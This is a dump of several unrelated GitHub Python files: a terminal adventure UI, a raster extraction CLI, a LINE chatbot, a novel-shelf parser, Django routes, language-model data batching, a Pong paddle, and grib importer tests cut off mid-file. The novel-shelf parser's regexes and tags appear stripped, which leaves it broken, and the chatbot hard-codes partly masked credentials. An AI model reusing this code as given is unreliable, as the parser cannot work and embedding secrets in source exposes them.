+{"seq_id":"27968991997","text":"import shutil\r\nfrom typing import Callable, Tuple\r\n\r\nfrom engine.types.aliases import InputHandler\r\nfrom definitions import os_name\r\n\r\nMIN_HEIGHT = 20 # The minimum height of the console\r\n\r\nclass TerminalController(object):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n # Terminal metadata\r\n self.terminal_height = shutil.get_terminal_size((80, 20)).lines\r\n self.terminal_width = shutil.get_terminal_size((80, 20)).columns\r\n\r\n # Initiate text positions\r\n self.main_title_pos = 1\r\n self.secondary_title_pos = 3\r\n self.first_text_pos = 7\r\n self.second_text_pos = 12\r\n self.hidden_text_pos = 14\r\n self.input_pos = 16\r\n\r\n # Initiate text\r\n self.main_title = \"\"\r\n self.secondary_title = \"\"\r\n self.first_text = \"\"\r\n self.second_text = \"\"\r\n self.hidden_text = \"\"\r\n\r\n # Initiate metadata\r\n self.view_hidden = False\r\n self.input_array = []\r\n\r\n if self.terminal_height < MIN_HEIGHT:\r\n raise Exception(\"Terminal size is too small\")\r\n \r\n def wipe_screen(self):\r\n \"\"\"\r\n Wipe the screen clean.\r\n \"\"\"\r\n if os_name == \"linux\":\r\n self.move(0)\r\n print((\" \" * self.terminal_width + \"\\r\\n\") * self.terminal_height)\r\n self.move(0)\r\n else:\r\n pass\r\n\r\n def move(self, y: int):\r\n \"\"\"\r\n Move the cursor to a position on the screen.\r\n \r\n :param x: the X position.\r\n :type x: int\r\n :param y: the Y position.\r\n :type y: int\r\n \"\"\"\r\n if os_name == \"linux\":\r\n print(\"\\033[{};{}H\".format(y, 0), end=\"\")\r\n else:\r\n pass\r\n \r\n def get_input(self, input_callback: InputHandler = lambda a: (a, False) \\\r\n if a != \"q\" \\\r\n else (a, True)) \\\r\n -> bool:\r\n \"\"\"\r\n Get input from the user via the terminal.\r\n \r\n :param input_callback: A function which processes the user input,\r\n returns print value and whether or not to continue\r\n getting input.\r\n :type input_callback: InputHandler, optional\r\n :return: the boolean result of the callable method.\r\n :rtype: bool\r\n \"\"\"\r\n input_string = \" > \"\r\n user_input = input(input_string)\r\n self.input_array.append(input_string + user_input)\r\n\r\n response = input_callback(user_input)\r\n if isinstance(response[1], list):\r\n self.input_array.extend(response[1])\r\n else:\r\n self.input_array.append(response[1])\r\n\r\n self.refrash_input()\r\n\r\n return response[0]\r\n \r\n def print_at(self, text: str, position: int):\r\n \"\"\"\r\n Print given text at given position.\r\n \r\n :param text: text to print.\r\n :type text: str\r\n :param position: position to print at.\r\n :type position: int\r\n \"\"\"\r\n self.move(position)\r\n print(text)\r\n \r\n def refrash(self):\r\n \"\"\"\r\n Refrash display.\r\n \"\"\"\r\n self.wipe_screen()\r\n\r\n # Set main title\r\n self.print_at(\" \" * ((self.terminal_width - len(self.main_title)) // 2) + \r\n self.main_title.upper() + \r\n \" \" * self.terminal_width,\r\n self.main_title_pos)\r\n\r\n # Set secondary title\r\n wrapper = \"-\" * ((self.terminal_width - len(self.secondary_title)) // 3)\r\n self.print_at(wrapper + self.secondary_title + wrapper * 2,\r\n self.secondary_title_pos)\r\n\r\n # Set first text\r\n self.print_at(self.first_text, self.first_text_pos)\r\n print(\"\")\r\n # Set secondary text\r\n self.print_at(self.second_text, self.second_text_pos)\r\n\r\n # Set hidden text\r\n if self.view_hidden:\r\n self.print_at(self.hidden_text, self.hidden_text_pos)\r\n\r\n # Set the input\r\n self.print_at(\"-\" * self.terminal_width, self.input_pos)\r\n\r\n self.input_array = []\r\n self.view_hidden = False\r\n \r\n def refrash_input(self):\r\n \"\"\"\r\n Refrash the input view\r\n \"\"\"\r\n # Wipe input screen\r\n if os_name == \"linux\":\r\n self.move(self.input_pos + 1)\r\n print((\" \" * self.terminal_width + \"\\r\\n\") * (self.terminal_height - self.input_pos - 2))\r\n\r\n self.move(self.input_pos + 1)\r\n left_rows = self.terminal_height - self.input_pos - 3\r\n\r\n print(\"\\r\\n\".join(self.input_array[-left_rows:]))\r\n else:\r\n print(\"\\r\\n\".join(self.input_array[1:]))\r\n self.input_array = []\r\n \r\n def enable_hidden_text(self):\r\n \"\"\"\r\n Show the hidden text and update the screen.\r\n \"\"\"\r\n self.view_hidden = True\r\n self.refrash()\r\n\r\n","repo_name":"GaintDwarf/py_adventure","sub_path":"UI/terminal_controller.py","file_name":"terminal_controller.py","file_ext":"py","file_size_in_byte":5096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"71683273878","text":"#!/usr/bin/env python\n\nimport argparse\n\nimport eovx\n\n\ndef main():\n\n parser = argparse.ArgumentParser(description='Data extraction',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('-g', '--geometry', dest='geometry', help='The geometry file', default=None)\n parser.add_argument('-v', '--values', dest='values', help='The raster values', default=None, nargs='+')\n parser.add_argument('-p', '--pattern', dest='pattern', help='The glob search pattern', default=None)\n parser.add_argument('-r', '--use-ray', dest='use_ray', help='Whether to use ray', action='store_true')\n parser.add_argument('-t', '--use-concurrency', dest='use_concurrency', help='Whether to use concurrent.futures', action='store_true')\n parser.add_argument('-n', '--num-cpus', dest='num_cpus', help='The number of CPUs to use for concurrent threading',\n default=1, type=int)\n parser.add_argument('-c', '--chunks', dest='chunks', help='The chunk size', default=1024, type=int)\n parser.add_argument('-b', '--band-names', dest='band_names', help='Band names', default=None, nargs='+')\n parser.add_argument('-o', '--outfile', dest='out_file', help='The output file', default=None)\n parser.add_argument('--version', dest='version', help='Show the version', action='store_true')\n\n args = parser.parse_args()\n\n if args.version:\n print(eovx.__version__)\n return\n\n ex = eovx.Extractor(args.geometry,\n num_cpus=args.num_cpus)\n\n df = ex.extract(args.values[0] if len(args.values) == 1 else args.values,\n pattern=args.pattern,\n use_ray=args.use_ray,\n use_concurrency=args.use_concurrency,\n chunks=args.chunks,\n band_names=args.band_names)\n\n if str(args.out_file).lower().endswith('.gpkg'):\n df.to_file(args.out_file, driver='GPKG')\n elif str(args.out_file).lower().endswith('.shp'):\n df.to_file(args.out_file, driver='ESRI Shapefile')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jgrss/eovx","sub_path":"eovx/scripts/eovx.py","file_name":"eovx.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"37414372937","text":"\n\"\"\"\ngit add .\ngit commit -am \"make it better\"\ngit push heroku master\n\n\"\"\"\n \nfrom flask import Flask, request, abort\nfrom linebot import (LineBotApi, WebhookHandler)\nfrom linebot.exceptions import (InvalidSignatureError)\nfrom linebot.models import *\nfrom random import choice\n\n\n\n\napp = Flask(__name__)\n\n# 設定linebot的基本資訊\nline_bot_api = LineBotApi('xxxxxxxxxxxxxxxxHio3aN15PTUu2isIxcxfwdB04t89/1O/w1cDnyilFU=')\nhandler = WebhookHandler('xxxxxxxxxxxxxxx4547d2304')\n\n\n# 設定route 和 webhook\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n # get X-Line-Signature header value\n signature = request.headers['X-Line-Signature']\n\n # get request body as text\n body = request.get_data(as_text=True)\n app.logger.info(\"Request body: \" + body)\n\n # handle webhook body\n try:\n handler.handle(body, signature)\n except InvalidSignatureError:\n abort(400)\n\n return 'OK'\n\n# 貼圖handle\n@handler.add(MessageEvent, message=StickerMessage)\ndef handle_sticker_message(event):\n\n line_bot_api.reply_message(\n event.reply_token,\n StickerSendMessage(sticker_id = choice(['146','145','140','170','507']),\n\t\t\t\t\t\t package_id = '2'))\n\t\n\n\n\n\n\n# 文字handle\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_text_message(event):\n\ttext = event.message.text\n\n\t\n\tif (\"掰\" in text) or (\"滾\" == text) or (\"討厭你\" in text):\n\t\tline_bot_api.reply_message(\n\t\t\tevent.reply_token, \n\t\t\tStickerSendMessage(sticker_id = choice(['507', '27', '32']),\n\t\t\t\t\t\t\t package_id = '2'))\n\n\t\t\n\t\t\n\telif \"終極密碼\" == text:\n\t\tline_bot_api.reply_message(\n\t\t\tevent.reply_token, \n\t\t\tTextSendMessage(text=\"\"\"這個功能還在開發中哦~\"\"\"))\n\t\t\n\t\t\t\n\telif \"ㄉ一ㄨˊ\" in text:\n\t\tline_bot_api.reply_message(\n\t\t\tevent.reply_token, \n\t\t\tTextSendMessage(text=\"\"\"ㄉ一ㄨˊㄉ一ㄨˊ的\"\"\"))\t\n\t\t\t\n\t\t\t\n\telif \"加油\" == text:\n\t\tline_bot_api.reply_message(\n\t\t\tevent.reply_token, \n\t\t\tTextSendMessage(text=\"\"\"加油~加油~\"\"\"))\n\t\t\t\n\t\t\t\n\telif \"功能\" == text:\n\t\tbuttons_template = TemplateSendMessage(\n\t\t\talt_text='Buttons template',\n\t\t\ttemplate=ButtonsTemplate(\n\t\t\t\ttitle='笨笨的我有笨笨的功能:',\n\t\t\t\ttext='小想要哪一個呢?',\n\t\t\t\tactions=[\n\t\t\t\t\tMessageTemplateAction(\n\t\t\t\t\t\tlabel='我想看小說',\n\t\t\t\t\t\ttext='我想看小說'\n\t\t\t\t\t)\n\t\t\t\t]\n\t\t\t)\n\t\t)\n\t\t\n\t\tline_bot_api.reply_message(event.reply_token, buttons_template)\n\t\t\t\n\t# 其他\n\telse:\n\t\tline_bot_api.reply_message(\n\t\t\tevent.reply_token, \n\t\t\tTextSendMessage(text=\"\"\"我笨笨的,聽不懂妳在說什麼\\n\"\"\"))\n\t\t\n\t\t\n\t\n\nif __name__ == \"__main__\":\n app.run()\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n","repo_name":"skydome20/linebot-test","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"16641436973","text":"#! /usr/bin/python\n# coding=UTF-8\n\nimport foxOS\nimport re\n\ndef loadFML(shelfPath='FoxBook.fml'):\n\ttxt = foxOS.fileread(shelfPath)\n\n\tbn = re.compile('(.*?)', re.I)\n\tbu = re.compile('(.*?)', re.I)\n\tbd = re.compile('(.*?)', re.S|re.I)\n\tbs = re.compile('(.*?)', re.I)\n\tbq = re.compile('(.*?)', re.I)\n\tba = re.compile('(.*?)', re.I)\n\tbcs = re.compile('(.*?)', re.S|re.I)\n\n\tpn = re.compile('(.*?)', re.I)\n\tpu = re.compile('(.*?)', re.I)\n\tps = re.compile('(.*?)', re.I)\n\tpc = re.compile('(.*?)', re.S|re.I)\n\n\tsc = re.compile('(.*?)', re.S|re.I)\n\tcc = re.compile('(.*?)', re.S|re.I)\n\n\tshelf = []\n\tfor bookg in sc.finditer(txt):\n\t\tbook = {}\n\t\tbookStr = bookg.group(1)\n\t\tbook['bookname'] = bn.findall(bookStr)[0]\n\t\tbook['bookurl'] = bu.findall(bookStr)[0]\n\t\tbook['delurl'] = bd.findall(bookStr)[0]\n\t\tbook['statu'] = bs.findall(bookStr)[0]\n\t\tbook['author'] = ba.findall(bookStr)[0]\n\t\tbook['qidianBookID'] = bq.findall(bookStr)[0]\n\t\tpages = []\n\t\tfor pageg in cc.finditer(bookStr):\n\t\t\tpage = {}\n\t\t\tpageStr = pageg.group(1)\n\t\t\tpage['pagename'] = pn.findall(pageStr)[0]\n\t\t\tpage['pageurl'] = pu.findall(pageStr)[0]\n\t\t\tpage['size'] = ps.findall(pageStr)[0]\n\t\t\tpage['content'] = pc.findall(pageStr)[0]\n\t\t\tpages.append(page)\n\t\tbook['chapters'] = pages\n\t\tshelf.append(book)\n\treturn shelf\n\ndef saveFML(shelf, savePath='FoxBook.fml'):\n\tfml = ['\\n\\n\\n']\n\tfor book in shelf:\n\t\tfml.append('')\n\t\tfml.append('\\t' + book['bookname'] + '')\n\t\tfml.append('\\t' + book['bookurl'] + '')\n\t\tfml.append('\\t' + book['delurl'] + '')\n\t\tfml.append('\\t' + book['statu'] + '')\n\t\tfml.append('\\t' + book['qidianBookID'] + '')\n\t\tfml.append('\\t' + book['author'] + '')\n\t\tfml.append('')\n\t\tfor page in book['chapters'] :\n\t\t\tfml.append('')\n\t\t\tfml.append('\\t' + page['pagename'] + '')\n\t\t\tfml.append('\\t' + page['pageurl'] + '')\n\t\t\tfml.append('\\t' + page['content'] + '')\n\t\t\tfml.append('\\t' + page['size'] + '')\n\t\t\tfml.append('')\n\t\tfml.append('')\n\t\tfml.append('\\n')\n\tfml.append('\\n')\n\tfoxOS.filewrite('\\n'.join(fml), savePath)\n\n\n# main 测试\nif \"__main__\" == __name__ :\n\timport time\n\tsTime = time.clock()\n\tshelf = loadFML('D:\\\\bin\\\\sqlite\\\\FoxBook\\\\FoxBook.fml.old')\n\n\teTime1 = time.clock() - sTime\n\tsTime = time.clock()\n\n\tsaveFML(shelf, './xxx.fml')\n\n\teTime2 = time.clock() - sTime\n\n\tprint(eTime1)\n\tprint(eTime2)\n\n\"\"\"\nfor book in shelf:\n\tprint( book['bookurl'] + \"|\" + book['bookname'].decode('UTF-8').encode('GBK') )\n\tfor page in book['chapters'] :\n\t\tprint( \"\\t\" + page['pageurl'] + \"|\" + page['pagename'].decode('UTF-8').encode('GBK') )\n\"\"\"\n\n","repo_name":"linpinger/foxbook-python27","sub_path":"fmlStor.py","file_name":"fmlStor.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74626043476","text":"from django.urls import path\nfrom .views import home, getAllItems, addItem, addBill, Register, updateItems, getPdf\n\nurlpatterns = [\n path('',home,name='home'),\n path('getAllItems/',getAllItems,name=\"Getallitems\"),\n path('addItem/',addItem,name=\"Additem\"),\n path('register/',Register,name=\"Register\"),\n path('addBill/',addBill,name=\"Addbill\"),\n path('updateItem/',updateItems,name=\"UpdateItem\"),\n path('getPdf/',getPdf,name=\"GetPdf\"),\n]\n","repo_name":"KartikKapil/Disecto_Assignment","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"26649135595","text":"import array\nimport numpy as np\nimport random\nimport math\nimport os\nimport logging\nimport time\nimport argparse\n\n\nclass Vocabulary(object):\n\n def __init__(self, path, min_occurrences=500, build=False):\n self._tok2id = {}\n self._id2tok = {}\n self._n_occurrences = {}\n self.unk = ''\n self.pad = ''\n self.mask = ''\n self.bos = ''\n self.eos = ''\n self._unk_id = -1\n self._pad_id = -1\n self._mask_id = -1\n self._bos_id = -1\n self._eos_id = -1\n\n if build:\n self._build(path)\n else:\n self._load(path)\n\n if self._unk_id == -1:\n self._unk_id = self._allocate_id(self.unk)\n if self._pad_id == -1:\n self._pad_id = self._allocate_id(self.pad)\n if self._mask_id == -1:\n self._mask_id = self._allocate_id(self.mask)\n if self._bos_id == -1:\n self._bos_id = self._allocate_id(self.bos)\n if self._eos_id == -1:\n self._eos_id = self._allocate_id(self.eos)\n\n self._vocab = set(\n [tok for tok, n_occurrences in self._n_occurrences.items()\n if n_occurrences >= min_occurrences])\n\n for n_occurrences in self._n_occurrences.values():\n if n_occurrences < min_occurrences:\n self._n_occurrences[self._unk_id] += n_occurrences\n \n self._vocab.add(self._unk_id)\n self._vocab.add(self._pad_id)\n self._vocab.add(self._mask_id)\n self._vocab.add(self._bos_id)\n self._vocab.add(self._eos_id)\n \n # sort vocab so that most frequent tokens come first\n self._vocab_list = sorted(\n list(self._vocab), key=lambda t: (-self._n_occurrences[t], t))\n self.size = len(self._vocab)\n \n self._tokid2vocabid = {\n tok_id: vocab_id\n for vocab_id, tok_id in enumerate(self._vocab_list)}\n self.unk_vocab_id = self._tokid2vocabid[self._unk_id]\n self.pad_vocab_id = self._tokid2vocabid[self._pad_id]\n self.mask_vocab_id = self._tokid2vocabid[self._mask_id]\n self.bos_vocab_id = self._tokid2vocabid[self._bos_id]\n self.eos_vocab_id = self._tokid2vocabid[self._eos_id]\n\n self.freq = np.ones([self.size])\n for i, tok in enumerate(self._vocab_list):\n self.freq[i] += float(self._n_occurrences[tok])\n self.freq /= np.sum(self.freq)\n\n def _allocate_id(self, token):\n new_id = len(self._tok2id)\n self._tok2id[token] = new_id\n self._id2tok[new_id] = token\n self._n_occurrences[new_id] = 0\n return new_id\n\n def id2str(self, vocab_id):\n return self._id2tok[self._vocab_list[vocab_id]]\n\n def str2id(self, token):\n if token not in [\n self.mask, self.bos, self.eos, self.pad, self.unk]:\n token = token.lower()\n if token not in self._tok2id:\n return self.unk_vocab_id\n token_id = self._tok2id[token]\n if token_id not in self._vocab:\n return self.unk_vocab_id\n return self._tokid2vocabid[token_id]\n\n def sentence2str(self, sentence):\n return ' '.join([self.id2str(x) for x in sentence\n if x != self.pad_vocab_id])\n\n def write_vocab_file(self, vocab_path):\n with open(vocab_path, 'w') as f:\n f.write('%d %d\\n' % (len(self._tok2id), self.n_tokens))\n\n for i in range(len(self._tok2id)):\n n_occurrences = (0 if i == self._unk_id\n else self._n_occurrences[i])\n f.write('%s %d\\n' % (self._id2tok[i], n_occurrences))\n\n def get_n_occurrences(self, vocab_id):\n return self._n_occurrences[self._vocab_list[vocab_id]]\n\n def _load(self, path):\n \"\"\" The format of the vocab file is as follows:\n n_unique_tokens n_tokens_total\n token_1 n_occurrences_1\n token_2 n_occurrences_2\n .\n .\n .\n token_n n_occurrences_n\"\"\"\n logging.info('Loading vocab from %s...' % path)\n with open(path, 'r') as f:\n ns = f.readline().strip().split()\n self._n_unique_tokens = int(ns[0])\n self.n_tokens = int(ns[1])\n \n for i in range(self._n_unique_tokens):\n line = f.readline().strip().split()\n if len(line) != 2:\n logging.warn('Invalid line: ' + str(line))\n continue\n tok = line[0]\n count = int(line[1])\n self._tok2id[tok] = i\n self._id2tok[i] = tok\n self._n_occurrences[i] = count\n if tok == self.unk:\n self._unk_id = i\n elif tok == self.pad:\n self._pad_id = i\n elif tok == self.mask:\n self._mask_id = i\n elif tok == self.bos:\n self._bos_id = i\n elif tok == self.eos:\n self._eos_id = i\n\n def _build(self, path):\n self._n_unique_tokens = 0\n self.n_tokens = 0\n \n with open(path, 'r') as f:\n for line in f:\n tokens = line.strip().split()\n for tok in tokens:\n tok = tok.lower()\n self.n_tokens += 1\n if self.n_tokens % 10000000 == 0:\n logging.info(\n 'Read %d million tokens' %\n (self.n_tokens // 1000000))\n if tok in self._tok2id:\n tokid = self._tok2id[tok]\n self._n_occurrences[tokid] += 1\n else:\n tokid = self._n_unique_tokens\n self._n_unique_tokens += 1\n self._tok2id[tok] = tokid\n self._id2tok[tokid] = tok\n self._n_occurrences[tokid] = 1\n if tok == self.unk:\n self._unk_id = i\n elif tok == self.mask:\n self._mask_id = i\n elif tok == self.bos:\n self._bos_id = i\n elif tok == self.eos:\n self._eos_id = i\n\nclass Batch(object):\n\n def __init__(self, unmasked_seqs, masked_seqs, seq_len,\n target_positions, targets, line_num=0):\n self.unmasked_seqs = unmasked_seqs\n self.masked_seqs = masked_seqs\n self.seq_len = seq_len\n self.target_positions = target_positions\n self.targets = targets\n self.line_num = line_num\n\n def n_tokens(self):\n return np.sum(self.seq_len - 2)\n\nclass ProtoBatch(object):\n\n def __init__(self, size, length, pad):\n self._size = size\n self._unmasked_seqs = pad * np.ones([size, length], dtype=np.int32)\n self._masked_seqs = pad * np.ones([size, length], dtype=np.int32)\n self._seq_len = np.zeros([size], dtype=np.int32)\n self._target_positions = []\n self._targets = []\n self._length = length\n self._count = 0\n self._line_num = 0\n\n def to_batch(self):\n if self._count < self._size:\n self._unmasked_seqs = self._unmasked_seqs[:self._count, :]\n self._masked_seqs = self._masked_seqs[:self._count, :]\n self._seq_len = self._seq_len[:self._count]\n\n return Batch(self._unmasked_seqs,\n self._masked_seqs,\n self._seq_len,\n np.array(self._target_positions),\n np.array(self._targets),\n line_num=self._line_num)\n\n def add_sentence(self, s, target_indices, masks, line_num):\n self._line_num = line_num\n n = len(s)\n self._unmasked_seqs[self._count, :n] = s\n for i, index in enumerate(target_indices):\n self._target_positions.append(\n self._count * self._length + index)\n self._targets.append(s[index])\n s[index] = masks[i]\n\n self._masked_seqs[self._count, :n] = s\n self._seq_len[self._count] = n\n\n self._count += 1\n\n return self._count == self._size\n\n \nclass Batcher(object):\n\n def __init__(self, batch_size, max_length, pad,\n variable_length=False, pad_prob=0.1):\n self._batch_size = batch_size\n self._max_length = max_length\n self._pad = pad\n self._variable_length = variable_length\n self._pad_prob = pad_prob\n self._proto_batches = [\n self._make_proto_batch(length)\n if self._variable_length or length == self._max_length\n else\n None\n for length in range(self._max_length + 1)]\n\n def _make_proto_batch(self, length):\n return ProtoBatch(\n self._batch_size, length, self._pad)\n\n def add_sentence(self, s, target_indices, masks, line_num):\n if self._variable_length:\n length = len(s)\n if len(s) < self._max_length and random.random() < self._pad_prob:\n length = random.randint(length + 1, self._max_length)\n else:\n length = self._max_length\n\n if self._proto_batches[length].add_sentence(\n s, target_indices, masks, line_num):\n batch = self._proto_batches[length].to_batch()\n self._proto_batches[length] = self._make_proto_batch(length)\n return batch\n\n return None\n\nclass Corpus(object):\n\n def __init__(self, path, vocab):\n self._path = path\n self._vocab = vocab\n\n def read_lines(self, max_seq_len):\n while True:\n with open(self._path, 'r') as f:\n for i, line in enumerate(f):\n tokens = line.strip().split()\n if len(tokens) > max_seq_len - 2 or len(line) == 0:\n continue\n yield ([self._vocab.bos_vocab_id] +\n [self._vocab.str2id(t) for t in tokens] +\n [self._vocab.eos_vocab_id], i)\n\n def generate_batches(self, batch_size, max_seq_len, mask_prob,\n must_contain=None, variable_length=False,\n pad_prob=0.1, masking_policy=[1.0, 0.0, 0.0]):\n batcher = Batcher(batch_size, max_seq_len, self._vocab.pad_vocab_id,\n variable_length=variable_length, pad_prob=pad_prob)\n for line, line_num in self.read_lines(max_seq_len):\n if must_contain is not None:\n valid = False\n for t in line:\n if t == must_contain:\n valid = True\n if not valid:\n continue\n if mask_prob > 0.0:\n mask_values = np.random.uniform(size=[len(line) - 2])\n target_indices = np.where(mask_values < mask_prob)[0] + 1\n if len(target_indices) == 0:\n continue\n masks = []\n assert abs(sum(masking_policy) - 1.0) < 1e-6\n mask_token_thresh = masking_policy[0]\n self_thresh = mask_token_thresh + masking_policy[1]\n for i in target_indices:\n r = random.random()\n if r < mask_token_thresh:\n masks.append(self._vocab.mask_vocab_id)\n elif r < self_thresh:\n masks.append(line[i])\n else:\n while True:\n t = random.randint(0, self._vocab.size-1)\n if t not in [self._vocab.pad_vocab_id,\n self._vocab.bos_vocab_id,\n self._vocab.eos_vocab_id]:\n masks.append(random.randint(0, self._vocab.size-1))\n break\n else:\n target_indices = []\n masks = []\n \n maybe_batch = batcher.add_sentence(\n line, target_indices, masks, line_num)\n if maybe_batch is not None:\n yield maybe_batch\n\n","repo_name":"AlanAnsell/PolyLM","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":12455,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"85"} +{"seq_id":"10378043827","text":"from turtle import Turtle\n\nMOVE_DISTANCE = 50\n\n\nclass Paddle(Turtle):\n def __init__(self, position):\n super().__init__()\n self.penup()\n self.shapesize(stretch_wid=5, stretch_len=1)\n self.shape('square')\n self.color('white')\n self.goto(position)\n\n def go_up(self):\n if self.ycor() < 250:\n self.goto(self.xcor(), self.ycor() + MOVE_DISTANCE)\n\n def go_down(self):\n if self.ycor() > -250:\n self.goto(self.xcor(), self.ycor() - MOVE_DISTANCE)\n","repo_name":"M-Anwar-Hussaini/Pong-Game","sub_path":"paddle.py","file_name":"paddle.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"70787323158","text":"\"\"\"Module to test NWP importer module.\n\"\"\"\nimport unittest\nfrom datetime import datetime\nfrom glob import glob\nfrom shutil import rmtree\nfrom os import makedirs, path\n\nfrom unimodel.io.importers_nwp import import_nwp_grib\n\n\nclass TestNWPImporter(unittest.TestCase):\n \"\"\"Tests function to import NWP grib files from filer to stage dir.\"\"\"\n\n config = {\n \"moloch_ecm\": {\n \"src_tar\": \"tests/data/nwp_src/moloch/\"\n \"moloch-grib2.{year}{month}{day}{run}\"\n \".1p6.tar.gz\",\n \"src\": \"moloch-1p6-rep.{year}{month}{day}{run}_{lt}.grib2\",\n \"compressed\": True,\n \"lead_time_digits\": 2,\n },\n \"wrf43_prs\": {\n \"src\": \"tests/data/nwp_src/wrf43_prs/\"\n \"WRFPRS-03.{year}{month}{day}{run}_{lt}\"\n \".grib\",\n \"compressed\": False,\n \"lead_time_digits\": 3,\n },\n \"wrf43_prs_tar\": {\n \"src\": \"tests/data/nwp_src/wrf43_prs/\"\n \"WRFPRS-03.{year}{month}{day}{run}_\"\n \"{lt}.grib\",\n \"lead_time_digits\": 3,\n \"compressed\": True,\n },\n \"ecmwf_hres\": {\n \"src\": \"tests/data/nwp_src/ecmwf_hres/A1S{month}\"\n \"{day}{run}00{valid_month}{valid_day}{valid_hour}1-99\",\n \"compressed\": False,\n },\n \"wrf_tl_ens\": {\n \"src_tar\": \"tests/data/nwp_src/wrf_tl_ens/\"\n \"NWCST_TL_ENS-membres.{year}{month}{day}{run}.tar.gz\",\n \"src\": \"tl_ens-03-{member}.{year}{month}{day}{run}_{lt}.grib\",\n \"compressed\": True,\n \"lead_time_digits\": 2,\n },\n \"no_lt_digits\": {\n \"src\": \"tests/data/nwp_src/wrf43_prs/\"\n \"WRFPRS-03.{year}{month}{day}{run}_{lt}\"\n \".grib\",\n \"compressed\": False,\n },\n \"wrf_gfs_3\": {\n \"src\": \"tests/data/nwp_src/wrf_gfs_3/WRFPRS_d01.{lt}\",\n \"compressed\": False,\n \"lead_time_digits\": 3,\n },\n \"nwp_dir\": \"tests/data/nwp_dir/\",\n }\n\n def setUp(self) -> None:\n moloch_dir = \"tests/data/nwp_dir/moloch_ecm\"\n if path.isdir(moloch_dir):\n rmtree(moloch_dir)\n\n makedirs(moloch_dir)\n open(\"tests/data/nwp_dir/moloch_ecm/example.tar.gz\", \"wb\")\n open(\"tests/data/nwp_dir/moloch_ecm/example.grib2\", \"wb\")\n\n wrfprs_dir = \"tests/data/nwp_dir/wrf43_prs\"\n if path.isdir(wrfprs_dir):\n rmtree(wrfprs_dir)\n\n makedirs(wrfprs_dir)\n open(\"tests/data/nwp_dir/wrf43_prs/WRFPRS_d01.001\", \"wb\")\n open(\"tests/data/nwp_dir/wrf43_prs/WRFPRS_d01.000\", \"wb\")\n\n return super().setUp()\n\n def test_io_import_nwp_grib_compressed(self):\n \"\"\"Tests import of a compressed grib file\"\"\"\n nwp_file = import_nwp_grib(\n datetime(2022, 11, 7, 0), 0, \"moloch_ecm\", self.config\n )\n\n self.assertEqual(\n nwp_file,\n \"tests/data/nwp_dir/moloch_ecm/moloch-1p6-rep.2022110700_00.grib2\",\n )\n\n def test_io_import_nwp_grib_compressed_tar_not_found(self):\n \"\"\"Tests import of a compressed grib file\"\"\"\n with self.assertRaises(FileNotFoundError) as err:\n import_nwp_grib(datetime(2022, 11, 15, 0), 0, \"moloch_ecm\", self.config)\n\n self.assertEqual(\n err.exception.args[0],\n \"tests/data/nwp_src/moloch/\"\n \"moloch-grib2.2022111500.1p6.tar.gz not found.\",\n )\n\n def test_io_import_nwp_grib_compressed_src_not_found(self):\n \"\"\"Tests import of a compressed grib file\"\"\"\n with self.assertRaises(FileNotFoundError) as err:\n import_nwp_grib(datetime(2022, 11, 7, 0), 200, \"moloch_ecm\", self.config)\n\n self.assertEqual(\n err.exception.args[0],\n \"moloch-1p6-rep.2022110700_200.grib2 not found in \"\n \"tests/data/nwp_src/moloch/\"\n \"moloch-grib2.2022110700.1p6.tar.gz.\",\n )\n\n def test_io_import_nwp_grib_not_compressed(self):\n \"\"\"Tests import of a not compressed grib file\"\"\"\n nwp_file = import_nwp_grib(\n datetime(2023, 2, 6, 0), 32, \"wrf43_prs\", self.config\n )\n\n self.assertEqual(\n nwp_file, \"tests/data/nwp_dir/wrf43_prs/WRFPRS-03.2023020600_032.grib\"\n )\n\n def test_io_import_nwp_grib_not_compressed_not_found(self):\n \"\"\"Tests import of a compressed grib file\"\"\"\n with self.assertRaises(FileNotFoundError) as err:\n import_nwp_grib(datetime(2022, 11, 15, 0), 0, \"wrf43_prs\", self.config)\n\n self.assertEqual(\n err.exception.args[0],\n \"tests/data/nwp_src/wrf43_prs/WRFPRS-03.2022111500_000.grib not found.\",\n )\n\n def test_io_import_nwp_grib_model_not_in_config(self):\n \"\"\"Tests import of a model not in configuration dictionary\"\"\"\n with self.assertRaises(KeyError) as err:\n import_nwp_grib(datetime(2022, 11, 7, 0), 2, \"molcho\", self.config)\n\n self.assertEqual(\n err.exception.args[0], \"molcho not in configuration dictionary.\"\n )\n\n def test_io_import_nwp_grib_model_not_src_tar(self):\n \"\"\"Tests import of a comprsessed model without src_tar\"\"\"\n with self.assertRaises(KeyError) as err:\n import_nwp_grib(datetime(2022, 11, 7, 0), 2, \"wrf43_prs_tar\", self.config)\n\n self.assertEqual(\n err.exception.args[0],\n \"src_tar must be included if compressed is set to True.\",\n )\n\n def test_io_import_nwp_grib_ecmwf_lt_0(self):\n \"\"\"Tests import of a ECMWF-HRES grib file corresponding to lt=0\"\"\"\n nwp_file = import_nwp_grib(\n datetime(2023, 2, 20, 0), 0, \"ecmwf_hres\", self.config\n )\n\n self.assertEqual(\n nwp_file, \"tests/data/nwp_dir/ecmwf_hres/A1S02200000022000011-99\"\n )\n\n def test_io_import_nwp_grib_ecmwf_lt_not_0(self):\n \"\"\"Tests import of a ECMWF-HRES grib file corresponding to lt!=0\"\"\"\n nwp_file = import_nwp_grib(\n 